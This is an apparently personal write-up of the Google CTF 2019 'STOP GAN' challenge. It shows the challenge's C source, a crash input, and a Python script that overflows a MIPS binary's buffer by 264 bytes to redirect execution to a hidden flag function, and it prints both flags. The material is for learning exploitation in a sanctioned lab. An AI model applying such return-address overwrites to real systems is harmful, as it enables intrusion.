Google CTF 2019
STOP GAN
Well it seems someone can’t keep their work life and their home life separate. You vaguely recall on your home planet, posters put up everywhere that said “Loose Zips sink large commercial properties with a responsibility to the shareholders.” You wonder if there is a similar concept here. Using the credentials to access this so-called Agricultural network, you realize that SarahH was just hired as a vendor or contract worker and given access that was equivalent. You can only assume that Vendor/Contractor is the highest possible rank bestowed upon only the most revered and well regarded individuals of the land and expect information and access to flow like the Xenovian acid streams you used to bathe in as a child. The portal picture displays that small very attractive individual whom you instantly form a bond with, despite not knowing. You must meet this entity! Converse and convince them you’re meant to be! After a brief amount of time the picture shifts into a biped presumably ingesting this creature! HOW DARE THEY. You have to save them, you have to stop this from happening. Get more information about this Gubberment thing and stop this atrocity. You need to get in closer to save them – you beat on the window, but you need access to the cauliflower’s host to rescue it.
buffer-overflow.ctfcompetition.com 1337
You can find my all CTF solution in here
When I donwloaded the attachment I saw .c and some mips binary code.
1 2 3 4 5 6 7 8 9 10 11 |
wget https://storage.googleapis.com/gctf-2019-attachments/4a8becb637ed2b45e247d482ea9df123eb01115fc33583c2fa0e4a69b760af4a mv 4a8becb637ed2b45e247d482ea9df123eb01115fc33583c2fa0e4a69b760af4a Stop_Gan.zip unzip Stop_Gan.zip Archive: Stop_Gan.zip extracting: bof extracting: console.c ls bof console.c pic Stop_Gan.zipfile console.c console.c: C source, ASCII text file bof bof: ELF 32-bit LSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=a31c48679f10dc6945e7b5e3a88b979bebe752e3, not stripped |
In the .c code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> /** * 6e: bufferflow triggering segfault - binary, compile with: * gcc /tmp/console.c -o /tmp/console -static -s * * Console allows the player to get info on the binary. * Crashing bof will trigger the 1st flag. * Controlling the buffer overflow in bof will trigger the 2nd flag. */ int main() { setbuf(stdin, NULL); setbuf(stdout, NULL); setbuf(stderr, NULL); char inputs[256]; printf("Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.\n Bonus flag for controlling the crash.\n"); while(1) { printf("\nConsole commands: \nrun\nquit\n>>"); if (fgets(inputs, 256, stdin) == NULL) { exit(0); } printf("Inputs: %s", inputs); if ( strncmp(inputs, "run\n\0", 256) == 0 ) { int result = system("/usr/bin/qemu-mipsel-static ./bof"); continue; } else if ( strncmp(inputs, "quit\n\0", 256) == 0 ) { exit(0); } else { puts("Unable to determine action from your input"); exit(0); } } return 0; } |
It says you can compile this source but I want to use original file.
I can open bof file with using qemu-mipsel.
In this question. As I understand we must to crash program with given input. So that in this case, I must to use buffer overflow method.
1 2 3 |
python -c "print 'a' * 500" | qemu-mipsel bof Cauliflower systems never crash >> segfault detected! ***CRASH***could not open flag |
It happens. So that I will try in web service
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
nc buffer-overflow.ctfcompetition.com 1337 Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command. Bonus flag for controlling the crash. Console commands: run quit >>run Inputs: run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA CTF{Why_does_cauliflower_threaten_us} Cauliflower systems never crash >> segfault detected! ***CRASH*** Console commands: run quit >> |
It works. So I will try to with python code.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
python -c "print('run\n' + 'a'*500)"| nc buffer-overflow.ctfcompetition.com 1337 Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command. Bonus flag for controlling the crash. Console commands: run quit >>Inputs: run CTF{Why_does_cauliflower_threaten_us} Cauliflower systems never crash >> segfault detected! ***CRASH*** Console commands: run quit |
Soo We found flag
CTF{Why_does_cauliflower_threaten_us}
Start to find Bonus flag.
I am try to find new adress for the print bonus flag. In this case I search functions in bof file
1 2 3 |
nm bof | grep flag 0049ffc0 D _dl_stack_flags 00400840 t local_flag |
I found the loca_flag function in bof file
We can try to jump that adress with using bof vuln
I try to find where the return address start and it is 264 so that I write bellow python to extract bonus flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
#!/usr/bin/env python3 import socket import time def main(): padding = "\x41" * 264 address = "\x50\x08\x40" payload = padding + address + "\n" with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as soc: soc.connect(("buffer-overflow.ctfcompetition.com",1337)) time.sleep(1) soc.recv(1024) soc.send("run\n".encode()) soc.send(payload.encode()) time.sleep(1) print(soc.recv(1024).decode("utf-8")) if __name__ == "__main__": main() |
Result:
1 2 3 4 5 6 7 8 9 |
./exploit.py Inputs: run CTF{controlled_crash_causes_conditional_correspondence} Cauliflower systems never crash >> Console commands: run quit >> |
Flag: CTF{controlled_crash_causes_conditional_correspondence}
Hiya,
Nice write up!
For the bonus flag, could you explain the following, I cannot figure it out :
1. how did you figure out the address starts at 264?
“I try to find where the return address start and it is 264 so that I write bellow python to extract bonus flag”
Then in the python script, how did you figured out those 2 lines :
padding = “\x41” * 264
address = “\x50\x08\x40”
Thank you very much!